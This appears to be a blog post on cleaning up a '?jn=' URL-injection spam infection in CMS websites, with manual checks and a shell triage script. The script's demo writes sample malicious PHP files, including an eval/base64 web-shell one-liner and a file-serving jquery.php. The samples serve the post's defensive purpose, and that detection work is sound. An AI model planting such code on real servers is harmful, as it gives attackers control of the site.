Injection via URL: www.site.ru/?jn=xxxxxxxx
Just the other day I came across a (new?) variant of spam malware for websites. Google classifies it as "URL injection."
Description
Links appear on your site that were never there and could not be there: you know the structure of the site and what its URLs normally look like, and these bogus URLs do not fit. In particular, links of the following form show up in the search engines' index:
www.site.ru/?jn=xxxxxxxx
Troubleshooting
Yandex Webmaster has not reacted to them yet, but Google Webmaster Tools issues a warning about a possible compromise of the site, together with recommendations on where to look. Unfortunately the recommendations are quite general, and pinpointing the actual problem takes time. Antivirus products and online site scanners give no result; the only thing that works is inspecting the site by hand.
Option A: Code Not Obfuscated
- Search the source for where and how the $_GET['jn'] parameter is used.
- Then follow the code to see where it writes or drops its files (for example: \js\swfupload\plugins\jquery\).
Option B: Code Obfuscated
- Look for a directory containing files whose names are the values that appear after "?jn=" in the bogus URLs.
- Look for suspicious executable files such as images/c0nfv.php.
- Check paths where files like "/img/icon/thumb/jquery.php" may be hiding.
- Check the modification date of the CMS configuration file.
- Check for the presence (and legitimacy) of base.php files: this is the body of the malware, and its code is obfuscated.
- Check the modification date of jquery.php and compare it with the date on which Google Webmaster Tools monitoring first flagged the infection.
Seen in
- CMS: Joomla, WordPress, DLE, PrestaShop, HostCMS
- Plugins: ImageZoomer, SWFupload, BlockCategories
- It is likely to turn up in almost any plugin that uses jQuery, and in any area of the site whose settings the administrators never got around to.
The full malicious code was placed under the cut; only this fragment of it survives on this page (note the randomized variable names):
    '.join("",file($ftdavmbe."/$uhvuusgp")).'
Here file() reads the file named by $uhvuusgp from the directory $ftdavmbe into an array of lines and join() concatenates them, so the script simply emits the contents of whatever file the injected URL points at. This is why the value after "?jn=" matches a file name in a directory on the server.
Reasons for hacking
Most likely one of three:
- A directory on the server that is open for writing;
- A vulnerability in the software running the site, usually a free CMS (content management system), for example an outdated, insecure version;
- A compromised third-party plugin on the site (the ones working with jQuery).
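As an added example (not code from the original post), the shell checks below automate the Option A and Option B triage steps and the "writable directory" cause. The web root layout, file names and dates are a constructed sample for the demonstration; the only things taken from the post are the ?jn= parameter and the kinds of locations (images/, img/icon/thumb/, js/.../jquery/) it mentions. The real malware body is obfuscated and not reproduced here.

```sh
#!/bin/sh
# Added example, not the original post's code: shell triage for the "?jn=" URL-injection.
# Assumptions for illustration: the directory layout, file names and timestamps below
# are a constructed sample, not the actual infected site or the real malware.
set -eu

# Option A: files that read the injected parameter, written as $_GET['jn'] or
# $_GET["jn"]. Start here when the code is not obfuscated.
find_jn_handlers() {
  grep -rlE '\$_GET\[.jn.\]' "$1" 2>/dev/null | sort
}

# Option B: PHP files sitting in directories that should hold only static assets
# (images/c0nfv.php, img/icon/thumb/jquery.php and the like).
find_php_in_asset_dirs() {
  find "$1" -type f -name '*.php' \
    \( -path '*/images/*' -o -path '*/img/*' -o -path '*/js/*' \
       -o -path '*/thumb/*' -o -path '*/icon/*' \) | sort
}

# Option B: the CMS config, jquery.php and base.php should predate the day Google
# Webmaster Tools first flagged the site. List files modified after a reference
# timestamp given in touch(1) form, e.g. 201403150000 (CCYYMMDDhhmm).
find_modified_since() {
  ref=$(mktemp)
  touch -t "$2" "$ref"
  find "$1" -type f -newer "$ref" | sort
  rm -f "$ref"
}

# Cause 1: directories under the web root that anyone can write to.
find_world_writable_dirs() {
  find "$1" -type d -perm -0002 | sort
}

# Constructed sample web root so the checks can run offline. The dropped files
# imitate the pattern in the post: a jquery.php that serves the file named in
# ?jn= (assumed reconstruction of the surviving join/file fragment) and a PHP
# file hidden among images.
make_sample_root() {
  root=$(mktemp -d)
  mkdir -p "$root/images" "$root/js/swfupload/plugins/jquery" "$root/img/icon/thumb"
  printf '<?php echo "site"; ?>\n' > "$root/index.php"
  printf '<?php // legitimate config\n' > "$root/config.php"
  printf 'GIF89a' > "$root/images/logo.gif"
  printf '<?php $f=$_GET["jn"]; echo join("",file(dirname(__FILE__)."/$f")); ?>\n' \
    > "$root/js/swfupload/plugins/jquery/jquery.php"
  printf '<?php eval(base64_decode($_POST["p"])); ?>\n' > "$root/images/c0nfv.php"
  find "$root" -type d -exec chmod 755 {} +
  echo "$root"
}

# Demo against the constructed sample when run as: sh triage.sh --demo
# Against a real site, call the functions with the web root, e.g.
#   find_jn_handlers /var/www/site.ru
#   find_modified_since /var/www/site.ru 201403150000
if [ "${1:-}" = "--demo" ]; then
  r=$(make_sample_root)
  echo "files reading \$_GET['jn']:"; find_jn_handlers "$r"
  echo "php in asset dirs:";          find_php_in_asset_dirs "$r"
  echo "world-writable dirs:";        find_world_writable_dirs "$r"
  rm -rf "$r"
fi
```

The date check is the most useful one in practice: a legitimate jquery.php or config file is not rewritten on the day Google starts flagging the site, so anything with a modification time after the first warning deserves a look even when its name seems harmless.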